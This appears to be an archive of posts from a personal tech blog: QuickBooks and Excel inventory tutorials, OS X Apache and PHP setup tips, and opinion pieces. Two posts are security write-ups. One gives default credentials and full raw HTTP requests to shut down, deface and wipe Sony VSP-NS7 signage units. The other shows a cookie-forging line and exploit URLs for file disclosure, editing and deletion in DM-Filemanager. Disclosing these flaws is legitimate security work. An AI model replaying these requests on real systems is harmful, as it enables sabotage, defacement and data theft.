nDarkness

Software

QuickBooks – Inventory Reorder System Part 1

by on May.28, 2011, under Computers, Software, Utilities, Windows

QuickBooks is an exceptionally good and well known piece of accounting software.  I have found that many things can be accomplished with QuickBooks if you are willing to think outside the box to get them done.

We all know that inventory is an important part of any business.  It must be tracked and accounted for properly to ensure fluid day to day operations.  We can train our staff and schedule customer service calls but if we don’t have the inventory on hand, we are stuck in a waiting game.

QuickBooks does not have a very good method to set-up reorder alerts at specific quantities.  You are allowed to set a reorder point for specific items and view them in the Company Snapshot screen.  Unfortunately we don’t know the specific quantity to order for each item or what the total cost of the order will be.  So how do we add this ability?  Why isn’t this feature included?  We could purchase third party software to accomplish this task but who wants to spend additional money on a feature that really should be included.

In this three part series I will show you how to modify existing inventory items we want to track, customize a report of these items and filter the results to give us an easy to use inventory reorder list.

Our first goal in this process is to edit the existing inventory items that we need to track.  These should be essential items that are used on a frequent basis.  First open up the item list, Lists => Item List, and double click on the items that need to be modified.  At the bottom of the Edit Item screen, you will notice a field labeled Reorder Point.  This is what QuickBooks uses to trigger a reorder point in the Company Snapshot screen.  You will need to enter the minimum quantity on hand that will prompt you to reorder.

Reorder Point

Now, lets setup a custom field to tell us how much of one item we wish to order.  This will be the maximum quantity that we wish to have on hand.  To do this we must be in single user mode if you work in a multi-user environment.  Next we need to click on Custom Field => Define Fields and select an unused label.  We will name this label Max Reorder Qty and make sure that the Use box is checked.  The final thing left to do is enter the max quantity we wish to have on hand of the particular item and click OK for all screens.

Max Reorder Qty Setup

Once you have finished setting up all of the items that you wish to track in your inventory list, we are ready to move on to the next part of our series.  QuickBooks – Inventory Reorder System Part 2 – Setting up a custom reorder report.

[Generate Report Part 2]

2 Comments :, , , more...

QuickBooks – Inventory Reorder System Part 2

by on May.28, 2011, under Computers, Software, Utilities, Windows

[Set up Items Part 1][Export to Excel Part 3]

In part one of our inventory reorder system series, we learned how to set our items up to have reorder points and max reorder quantities. Now we need be able to generate a report so that we know what needs to be reorder and how many we need to order.

To begin this process we will open the item list, Lists => Item List and click on Reports => Item Listing at the bottom of the page.

Item List

This will bring up a list of all the items in our inventory list.  We will probably not need all of these parts, so we need to filter the results to give us just the items with reorder points set.  To do this click on Modify Report => Filters and select Reorder Point.  Now select the option for >= and add a 1 in the text field.

Modify Report

Next we need to click on the Display tab and remove several colums.  The columns to remove are price, sales tax code and preferred vendor from the custom report.  Now we need to memorize the report so that we don’t have to make these changes again.  To do this click on Memorize Report, name it Reorder Report and save it in the inventory group of the memorized reports.

Memorize Report

Now that we have finished this step, we are ready to move on to our final part in the inventory reorder system series.  QuickBooks – Inventory Reorder System Part 3.

[Set up Items Part 1][Export to Excel Part 3]

2 Comments :, , , more...

QuickBooks – Inventory Reorder System Part 3

by on May.28, 2011, under Computers, Software, Utilities, Windows

[Set up Items Part 1][Generate Report Part 2]

In the first two parts of our series, we determined that QuickBooks does not have an all-in-one function to give you a report on items that need to be reordered.  Because of this deficiency, we have developed a system to generate a list in QuickBooks, export it to Excel and extract the information we need.

To generate this report, click on Reports => Memorized Reports => Inventory => Reorder Report.

Memorized Report

This will bring up an item listing report that has been previously setup and formatted.  This will take care of the QuickBooks side of this process and all that needs to be done now is export the report to Excel and make a few formatting changes.

(Please note that these instructions were written for Office 2003. If anyone needs instructions for Office 2007, please let me know and I will post them.)

The first change is to shorten header columns for printing purposes.  To allow us to shorten the header columns click on Edit => Replace or press Ctrl+H.  This will allow you to find and replace words in an Excel document.  The words we want to replace are quantity with Qty, sales order with SO and purchase order with PO.  The next step is to select all of blank column A and delete it.  Now select columns F-J and click on Format => Columns => AutoFit Selection.

Now we need to add two column headers, one for Reorder Qty and one for Total Cost.  Once this is finished your sheet should look similar to the one below.

Excel Report

With the formatting out of the way we are ready to enter the formula for the reorder quantity column.  Under the Reorder Qty column, J in this example, on the row below the header, enter the following formula:

=IF(I2-G2-F2+E2=0,"",IF(H2="","",IF(G2<=H2,I2-G2-F2+E2,"")))

The first part of this formula checks to see if the max reorder quantity minus the quantity on hand minus the quantity on order plus the quantity on sales order equals zero.  If it does, that means we have enough on order and there is no need to order more.  If H2 is blank don’t add it into the equation either.  If the quantity on hand is not less than or equal to zero then we subtract the same rows again and enter the result into our spreadsheet.

The total cost column formula will be much easier to type.  All we need to do is multiply the reorder quantity by the cost column to get the total amount.  In this example the formula looks like this:

=J2*D2

With the formulas entered, copy them down to the last row and we are ready to sort the spreadsheet.  Select the reorder quantity header and click Data => Filter => AutoFilter.  Now you will notice drop down selection boxes for each of the column headers.  Click on the drop down box for the Reorder Point column and select nonblanks.  Repeat this step for the reorder quantity column.  You should end up with something similar to the picture below.

Final Report
To total the Total Cost column, we need to insert a sumif formula that will do the work for us.  In our example it would look something similar to what you see below.

=SUMIF(J214:J4380,">0",K214:K4380)

This basically says that we need to sum all of column K if the cells in column J are greater than 0.  This formula will vary greatly with each report that is extracted from QuickBooks.

The only steps remaining are to format and print the report and use it to order the items.  Using this report along with proper tracking of the inventory on hand will make the ordering process much easier. Feel free to let me know if you have any issues.

[Set up Items Part 1][Generate Report Part 2]

1 Comment :, , , more...

Sony VSP-NS7 Digital Signage Hacking

by on Sep.07, 2010, under Computer Security, Privacy, Software

Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me considering I had used its predecessor the NSP100 and the newer technology was just what the client needed.

After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.

From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.


    Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
    Authorization: Basic NSPXuser:NSPXuser

    space

Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?

Below are some of my findings:


    Default user information
    ————————
    User: NSPXuser
    Pass: NSPXuser
    Port: 4980

    Found commands
    ————————
    http://ip:4980 – Contains sofware version, unit name, unit and harddrive serial number and MAC address.
    http://ip:4980/import/ – Contains all user uploaded content.
    http://ip:4980/command.php – Uses several get variables to control the box.
    http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.

    http://ip:4980/command.php?cmd=NLOG&comp=cab – Download system logs.
    http://ip:4980/command.php?cmd=SLOG – Displays system logs.
    http://ip:4980/command.php?cmd=SYST – System statistics.
    http://ip:4980/command.php?cmd=DRST – Harddrive statistics.
    http://ip:4980/command.php?cmd=PLCL – Play files.
    http://ip:4980/command.php?cmd=SPCL – Stop playing files.
    http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
    http://ip:4980/command.php?cmd=LCNF – Load configuration files.
    http://ip:4980/command.php?cmd=RMCL – Remove files.
    http://ip:4980/command.php?cmd=LTBL – Load tables.

    Power off and restart
    ————————
    http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
    http://ip:4980/command.php?cmd=RSET&reboot – Restart unit

    space

Shutdown Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RSET&amp;shutdown HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Without any warning the unit will shut down and have to be restarted from the box or management software if the network allows magic packets.

URL Injection/Defacement Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/db/property0.xml&amp;append=0&amp;mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 601
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?>
<content ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<delete table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
	</delete>
	<insert table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
		<cdate>2010-09-06 21:21:55.678</cdate>
		<title>Pwnage</title>
		<size>0</size>
		<deldate>2010-10-06</deldate>
		<link>http://www.ndarkness.com/?p=577</link>
		<info>Pwned</info>
		<change>01</change>
		<width>0</width>
		<height>0</height>
		<xoffset>0</xoffset>
		<yoffset>0</yoffset>
		<xoption>0</xoption>
		<xreload>0</xreload>
	</insert>
</content>

Next we write the group file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/group0.xml&amp;append=0&amp;mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 185
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?>
<group ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<property date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>/import/db/property0.xml</property>
</group>

Now we need to load the file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=LTBL&amp;file=/import/group0.xml&amp;mode=2 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Finally let’s force the unit to call our url.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=PLCL&amp;id=06&amp;index=004000003 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Delete Files From Sony VSP-NS7

First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=CLST&amp;table=still HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Now we simply select the image we want to delete and enter the following:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RMCL&amp;table=still&amp;index=002000002 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

The VSPA-D7 management software does allow the default password and port to be changed but if the traffic is sniffed, the password can be easily decoded again. Not to mention we can use similar attack method to change the password of the box and lock the administrator out. Talk about a denial of service!

The only secure solution for this unit, is to use a crossover cable and directly connect to the box or put it on a network by itself. If you leave it on a public network it is only a matter of time before it falls prey to one of the attacks listed above.

1 Comment :, , , , more...

OS X – Apache Web Sharing Starts But You Are Unable Connect

by on Sep.06, 2010, under Mac OS X, Software

In an effort to save you an afternoon of searching, I thought I would post this to help the OS X users having this issue. There are the usual causes of no content in the web root, firewall blocking requests, incorrect permissions and/or httpd.conf syntax errors. The one error that is a little tougher to track down is apache not being able to create log files. Check the line in the httpd.conf file that shows the path to apache’s log file. It should look something like this:

ErrorLog “/private/var/log/apache2/error_log”

Now if the directory apache2 does not exist in /private/var/log/, apache will fail to start without giving you much of an error message. To correct this, in terminal type:

sudo mkdir /private/var/log/apache2

Enter your admin password and restart apache either in System Preferences=>Sharing=>Web Sharing or in terminal by typing:

 sudo apachectl restart

Once this is done, enter your web address in the web browser and you should see your pages load. Hope this helps!

2 Comments :, , , more...

DM-Filemanager 3.9.6-9 Multiple Vulnerabilities

by on Aug.28, 2010, under Computer Security, Privacy, Software, Utilities

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The next major issues we found with DM-Filemanager version 3.9.6 – 3.9.7-9* dealt with several vulnerabilities. Below is the method used to exploit this vulnerability and a list of possible exploits. Please be aware that this has since been fixed and is no longer vulnerable.

I discovered that direct calls to ajax.php, code.php and rich.php are not properly validated. Possible exploits for this vulnerability are file disclosure, loss of data and sensitive information, XSS (via source code editing), session hijacking (via XSS), web site defacement and database manipulation/exposure.

*You must use:

javascript:void(document.cookie=&quot;USER=someadminuser&quot;); void(document.cookie=&quot;USERID=50&quot;);void(document.cookie=&quot;GROUP=ADMINISTRATORS&quot;); void(document.cookie=&quot;GROUPID=1&quot;);

Create a new file (see edit below for an easier method):

    http://localhost/dm-filemanager/ajax.php?newfile=yes&filename=index.php

Download files:

    http://localhost/dm-filemanager/?download=yes&file=settings.php&currdir=/dm-filemanager/

Rename:

    http://localhost/dm-filemanager/ajax.php?file=index.shtml&currdir=/&destination=/&rn=yes&newname=index.html

Copy:

    http://localhost/dm-filemanager/ajax.php?file=config.php&currdir=/&destination=/&cp=yes

Edit: (This one has potential ;-))

    http://localhost/dm-filemanager/code.php?editfile=yes&file=exploit.php&currdir=/

Delete File:

    http://localhost/dm-filemanager/ajax.php?delete=yes&file=index.php&currdir=/wp/&destination=/wp/

Delete Folders:

    http://localhost/dm-filemanager/ajax.php?currdir=/wp/&rmdir=yes&folder=/wp/wp-admin&dir=wp-admin

All DM-Filemanager users are strongly encouraged to upgrade their software to the latest version.

Leave a Comment :, , , , , more...

Mac OS X – Update PHP, MySQL and Easily Add GD Support

by on May.19, 2010, under Mac OS X, Software, Utilities

If you have ever tried compiling the GD library on Mac OS X, you know that there are several issues to overcome before it is usable. Not to mention the version of PHP included with OS X wasn’t compiled with this option. In this post I will detail an easy method to update PHP, install MySQL and the GD library in just a few steps.

To start this process, we need to grab a couple of install packages from the links listed below:

Once you have these packages downloaded, we can start by installing MySQL. Open the MySQL image and install the package by following the directions. When the install process finishes, copy the MySQL.prefPane to “your_user/Library/PreferencePanes”. Doing this allows you to start and stop the server from the system preferences window. Finally, make sure you take the time to secure your new installation.

If you had previously enabled the PHP module in the httpd.conf file, make sure you comment it back out.

Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)

  • First type: “vi /etc/apache2/httpd.conf”
  • Find the PHP module:
    LoadModule php5_module libexec/apache2/libphp5.so
  • Type: “i” and change the line to read:
    #LoadModule php5_module libexec/apache2/libphp5.so
  • Now press the “esc” key, type “:wq” and press “enter”

The next step in this process is to install an updated version of PHP with GD support. The great thing about using the Entropy package, is that all of the hard work is already done for you! Open the installer and click the customize button if you don’t need all of the included extensions.

Once you have chosen the extensions you need, click install. When the install finishes, the last thing we need to do is edit the php.ini.

Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)

  • First type: “vi /usr/local/php5/lib/php.ini”
  • Now type: “?mysql” and scroll up until you get to the lines that look like this:
    mysql.default_socket = /tmp/mysql.sock
    mysqli.default_socket = /tmp/mysql.sock
  • Type “i” and change them to:
    mysql.default_socket = /var/mysql/mysql.sock
    mysqli.default_socket = /var/mysql/mysql.sock
  • Finally press the “esc” key, type “:wq” and press “enter”

Now all you have to do is start Web Sharing from the system preferences window and all of your new features will be ready to use.

Leave a Comment :, , , , more...

Should MySpace Be Put Out to Pasture?

by on May.13, 2010, under Myspace, Privacy, Social Networking, Software

For years I have heard many people talk about how MySpace has been losing popularity and that it will soon be gone. As of today, these predictions have yet to come true.

I can’t help but remember when everyone I knew was talking about this great new site called MySpace. I remember feeling like maybe I was missing the boat because I hadn’t bought into the hype of creating my account, customizing the page and reconnecting with all of my friends. Don’t get me wrong, I think the social networking phenomenon is a great concept and is obviously widely popular. Many starting bands have had great success using this medium to get their music out there for the world to hear and we are able to communicate with friends and family all over the world for free. With that said, I don’t really regret not buying in to this concept, I just regret not coming up with the idea first. Let’s face it, the idea of exploit my members at every turn in order to make myself more money is just genius.

So why is it that MySpace is not as popular as it once was? Where did they go wrong and can they come back from their downward spiral? Well, to be honest, I’m not really sure and personally don’t even care.

The idea of putting my personal life out there for the world to see, doesn’t appeal to me. Most people will agree that they like their privacy and are often offended when it is violated. However, these same people will put all of their information, pictures and videos out there for the world to see. I haven’t even begun to mentioned the spam and phishing attacks that have plagued these sites since their creation that so many people are fooled by daily. Does anyone see a problem here? What better playground for social engineering and identity theft can you ask for? It’s like a one stop shop for all your criminal needs.

So what are your thoughts on the future of MySpace and/or social networking?

2 Comments :, , more...

WordPress Sites Hacked in Bulk

by on May.10, 2010, under Computer Security, Linux, Privacy, Software

By now, I’m sure we have all heard about the numerous WordPress sites that have been hacked on several of the major hosting providers. From all of the reports so far, no one can seem to figure out what the problem is or how the breaches are happening.

Is the problem a server misconfiguration, outdated WordPress blog, weak passwords or a serious bug in WordPress itself?

If your site has been hacked and you have access to the access_logs, post them along with any other relevant information that you have and as a community let’s go through the information to see if we can find the problem.

Leave a Comment :, , , more...

Intuit QuickBooks Discount Error Goes Unfixed

by on May.06, 2010, under Mac OS X, Software, Utilities, Windows

Unless you live in a secluded cave in the middle of nowhere, you have undoubtedly heard of a little program called QuickBooks by Intuit. This program comes in a variety of different flavors to suit your personal and/or business needs. This software can be surprisingly simple to use with little to no effort.

In a few cases when I invoice a customer, I will charge them for a product at full price and then a few lines down discount the product to the agreed upon selling price. This helps me to demonstrate the value associated with the services I provide and also allows me to charge more later if the circumstances change. QuickBooks has a special item that is setup for this very discount function.

During my normal day-to-day operations, I received a phone call from a customer that was unable to determine how I arrived at a sales tax figure. Thinking this was a simple error on the customer’s behalf I pulled up the invoice, ran the figures and was shocked when I realized that the math absolutely did not work. Wanting to get to the bottom of this, I asked to call the customer back and began trying to figure the problem out. After working with the problem for a few moments I remembered that my company has a full service plan and decided to call Intuit to report the problem. After jumping through several hoops and being transferred to a level 2 support member, I was told that this was expected behavior. The invoice in question had taxable and non-taxable items on it with the discount appearing at the very bottom of the invoice. She explained that the QuickBooks calculator added all the items up as it went along and when it encountered a discount it treated it as a payment and reduced the previous line items by a percentage.

Let see an example:

Our tax amount will be 8%.
Now we have an item that costs $1 and is taxable: $1 x 8% = $1.08
Another item for $1 that is not taxable: $1 x 0% = $1
A discount of $1 that is also taxable: $1.08 + $1 = 2.08 – $1.08 = $1

Now here is a screen shot from QuickBooks with the same problem:
(Click to enlarge)

As you can see, QuickBooks manages to figure this total to be $1.04. She then explained that the work around to this problem was to add all of the taxable items first, then use the taxable discount and finally add the non-taxable items and a non-taxable discount if needed. I asked if this was going to be improved and was told that I could submit this as a suggestion for a future version as an improvement.

This just goes to show you that you can’t always trust shiny software even if you pay for it and you should always double check your math.

17 Comments :, , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Blogroll

A few highly recommended websites...